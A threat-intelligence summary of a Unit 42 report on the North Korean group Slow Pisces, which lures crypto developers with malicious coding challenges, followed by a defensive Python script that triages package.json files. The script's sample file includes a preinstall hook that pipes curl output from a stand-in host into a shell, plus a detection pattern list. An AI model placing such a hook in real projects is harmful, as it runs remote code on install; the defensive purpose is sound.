Full Report
North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges. The post Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware appeared first on Unit 42.
Analysis Summary
# Threat Actor: Slow Pisces
## Attribution & Identity
* **Attribution:** North Korean (DPRK) state-sponsored threat group.
* **Known Aliases:** Jade Sleet, TraderTraitor, PUKCHONG.
## Activity Summary
Slow Pisces is primarily focused on generating revenue for the North Korean regime. The group was recently connected to attacks on the cryptocurrency sector, including the theft of $308 million from a Japan-based company in December 2024 and alleged involvement in the theft of $1.5 billion from a Dubai cryptocurrency exchange. Its current campaign targets cryptocurrency developers by posing as potential employers on LinkedIn and sending malware disguised as fraudulent coding challenges. In 2023, the group reportedly stole over $1 billion from the cryptocurrency sector through methods such as fake trading applications and supply chain compromises via NPM.
## Tactics, Techniques & Procedures
* **Social Engineering:** Posing as potential employers on LinkedIn to engage developers.
* **Initial Access/Delivery:** Distributing malware hidden within malicious coding challenges that require developers to run compromised projects.
* **Supply Chain Compromise:** Distributing malware via the Node Package Manager (NPM).
* **Malware Deployment:** Deploying custom malware (RN Loader, RN Stealer) through the delivery vectors above.
* *Specific MITRE ATT&CK IDs were not provided in the source material.*
## Targeting
* **Sectors:** Cryptocurrency sector (primary focus).
* **Geography:** Not explicitly stated; the victims mentioned were based in Japan and Dubai (UAE).
* **Victims:** Cryptocurrency exchanges and other large organizations, approached through their developers.
## Tools & Infrastructure
* **Malware Families Used:** RN Loader, RN Stealer.
* **Infrastructure:** Malware distributed via the Node Package Manager (NPM). Other past methods included fake trading applications.
## Implications
Slow Pisces represents a highly effective, financially motivated threat actor sponsored by the DPRK. Its social engineering is tailored specifically to developers (malicious coding challenges), and its established supply chain pipeline (NPM) lets it bypass conventional perimeter defenses and gain deep access to high-value financial targets, resulting in large-scale thefts.
## Mitigations
* Employ security solutions such as Next-Generation Firewalls with Advanced URL Filtering and Advanced DNS Security.
* Users (especially developers) should report suspicious activity on platforms like LinkedIn and GitHub.
* Exercise extreme caution when downloading and executing code from unsolicited sources, particularly when the request arrives through a recruiting pitch or other social engineering contact.
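A pre-execution triage check for an unsolicited project, as an added example and not code from the Unit 42 report: it parses a constructed `package.json`, flags npm lifecycle scripts that run automatically during `npm install` (before any challenge code is even opened), and flags script commands or dependency specifiers that fetch or evaluate remote content. The sample package, the hook list and the pattern list are assumptions for illustration, not indicators from the report.

```python
import json
import re

# Constructed sample package.json for an unsolicited "coding challenge" repo (not from the report).
SAMPLE_PACKAGE_JSON = """{
  "name": "trading-challenge",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "node -e \\"require('child_process').exec('curl -s http://example.invalid/setup | sh')\\"",
    "test": "jest"
  },
  "dependencies": {"lodash": "^4.17.21", "react-native-helper": "latest"}
}"""

# Lifecycle hooks that npm executes on its own during `npm install` (assumed list for this example).
AUTO_RUN_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Command fragments that commonly indicate a script fetching or evaluating remote content.
RISKY_PATTERNS = [
    (r"\bcurl\b|\bwget\b", "downloads remote content"),
    (r"node\s+-e\b|\beval\(", "evaluates inline or dynamic code"),
    (r"child_process|\bexec\(", "spawns a subprocess"),
    (r"\|\s*(sh|bash)\b", "pipes output into a shell"),
]


def triage_package_json(text):
    """Return a list of (severity, finding) tuples for a package.json string."""
    pkg = json.loads(text)
    findings = []
    for name, cmd in pkg.get("scripts", {}).items():
        auto = name in AUTO_RUN_HOOKS
        if auto:
            findings.append(("high", f"lifecycle script '{name}' runs automatically on install"))
        for pattern, why in RISKY_PATTERNS:
            if re.search(pattern, cmd):
                # Risky behaviour in an auto-run hook is worse than in a script the developer invokes by hand.
                findings.append(("high" if auto else "medium", f"script '{name}' {why}"))
    for dep, spec in pkg.get("dependencies", {}).items():
        # Unpinned or URL-sourced dependencies can resolve to arbitrary code at install time.
        if spec in ("latest", "*") or spec.startswith(("http", "git")):
            findings.append(("medium", f"dependency '{dep}' is unpinned or fetched from a URL ({spec})"))
    return findings


if __name__ == "__main__":
    for severity, message in triage_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{severity}] {message}")
```

Run it against the `package.json` of any project you have been asked to build before running `npm install`; a high finding means the install step itself would execute code.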